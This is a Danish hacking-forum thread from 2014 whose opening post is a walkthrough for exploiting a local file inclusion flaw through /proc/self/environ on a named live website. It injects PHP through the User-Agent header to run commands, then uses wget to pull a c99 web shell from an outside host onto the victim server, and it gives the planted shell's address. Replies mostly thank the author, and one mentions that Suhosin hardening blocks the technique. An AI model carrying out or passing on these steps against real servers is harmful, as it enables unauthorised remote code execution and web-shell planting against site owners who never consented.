lfi via /proc/self/environ
|
18-01-2014, 18:50
(Denne besked var sidst ændret: 18-01-2014, 21:16 af R3dpill.)
|
|||
|
|||
lfi via /proc/self/environ
Denne guide er en ”efterfølger” på min tidligere guide om lfi via php://input. Derfor vælger jeg at springe en smule af introduktion til lfi + identifikation af lfi-afsnittene over, da der allerede står lidt om det i http://www.shellsec.pw/showthread.php?tid=1368
ligesom i vores sidste øvelse har vi en lille forsøgskanin, som er http://deltabec.name/main.php?include=helena.html Ligesom sidste gang kan vi hurtigt se, at include-parameteret ”sladrer” om serverens indhold ved brug af /etc/passwd Og det gør den også ved /proc/self/environ denne gang! Ligesom sidste gang vælger vi at bruge firefox som browser, og vi skal desuden bruge tamper data-plugin. Hvis I er helt uerfarne med, hvad tamper data bruges til, så kan det anbefales lige at læse på Spagnum's introduktion til det her http://www.shellsec.pw/showthread.php?tid=77 Nu skal vi så prøve at aktivere vores tamper data plugin, hvorefter vi opdateren siden. Læg bla. Mærke til, hvad jeres user agent vil sige Efter vi prøver at lave tamper data, vil vi prøve at teste for RCE (remote code execution) ligesom sidste gang. Gør som i billedet nedenunder og skriv i UA-feltet <?system('id');?> og tryk på ok. Bagefter vil der komme nogle andre irrelevante ting, som den vil spørge om du vil bruge tamper data på. Ignorer dem og vent til siden loader Hvis alt er gjort rigtigt, kan vi nu se, at vi kan lave RCE via brugeren vceroot! Til til at shelle nu For at lægge et shell op på serveren, skal I bare skrive ligesom i sidste vejledning <?system('wget http://www.sh3ll.org/c99.txt -O shell.php');?> eller noget andet, alt efter hvad jeres shell skal hedde :P Hvis alt er gået som det skulle, har vi nu et c99 shell liggende på http://deltabec.name/shell.php – ligesom sidst, vil jeg gerne bede folk om at lade være med at deface eller andet, da det kun ødelægger formålet med vejledningen, hvis folk defacer og admin patcher fejlen Håber det var noget folk kunne bruge til noget :) EDIT: Der lader til at være problemer med billederne, så linker lige til dem her i bunden som et midlertidigt alternativ - de er sorteret i rækkefølge http://s22.postimg.org/hestu751r/image.png http://s22.postimg.org/l9w7wro7j/image.png http://s22.postimg.org/vik3oumvj/image.png ttp://s22.postimg.org/ojan38cb3/image.png |
|||
18-01-2014, 19:10
|
|||
|
|||
RE: lfi via /proc/self/environ
Billeder virker ikke her... ;)
yolo
|
|||
18-01-2014, 19:23
|
|||
|
|||
RE: lfi via /proc/self/environ | |||
18-01-2014, 19:33
|
|||
|
|||
RE: lfi via /proc/self/environ
De virker desværre heller ikke her.
Du har nok lavet noget forkert med dem. |
|||
18-01-2014, 20:52
(Denne besked var sidst ændret: 18-01-2014, 21:00 af R3dpill.)
|
|||
|
|||
RE: lfi via /proc/self/environ
Jeg har opdateret OP med links til billederne i bunden som alternativ nu :) Håber det kan gå i stedet - kan også se nu her, at billederne fx. ikke vil loade, når jeg prøver i firefox :P
|
|||
18-01-2014, 21:13
|
|||
|
|||
RE: lfi via /proc/self/environ
(18-01-2014, 20:52)nevada Skrev: Jeg har opdateret OP med links til billederne i bunden som alternativ nu :) Håber det kan gå i stedet - kan også se nu her, at billederne fx. ikke vil loade, når jeg prøver i firefox :P Alt tyder på at det er et generelt problem med postimg, prøv evt. med imgur, puush eller lign. i stedet :) |
|||
18-01-2014, 21:16
|
|||
|
|||
RE: lfi via /proc/self/environ | |||
18-01-2014, 22:17
|
|||
|
|||
RE: lfi via /proc/self/environ
Tak for begge Lfi guides, rigtigt godt arbejde
Don't learn to hack, hack to learn
|
|||
18-01-2014, 23:15
|
|||
|
|||
RE: lfi via /proc/self/environ
Udemærket guide.
Hvis nogen ikke kan få det til at virke, har de sikkert en PHP, som er compilet med Suhosin patchen, som hærder PHP en del...bl.a. kan man ikke læse fra /proc, så denne teknik vil ikke virke der. |
|||
18-01-2014, 23:26
|
|||
|
|||
RE: lfi via /proc/self/environ
(18-01-2014, 23:15)BlimBlamBlar Skrev: Udemærket guide. tak for tippet :) Havde også selv erfaret, at det ikke var alle domæner det kunne gøres på, men vidste faktisk ikke, hvad den reelle årsag til det var :) (18-01-2014, 22:17)Spagnum Skrev: Tak for begge Lfi guides, rigtigt godt arbejde takker :) Har tænkt mig, at jeg snart vil kaste mig ud i log poisoning via lfi, så der kommer nok endnu en efterfølger på et tidspunkt |
|||
|
User(s) browsing this thread: 1 Gæst(er)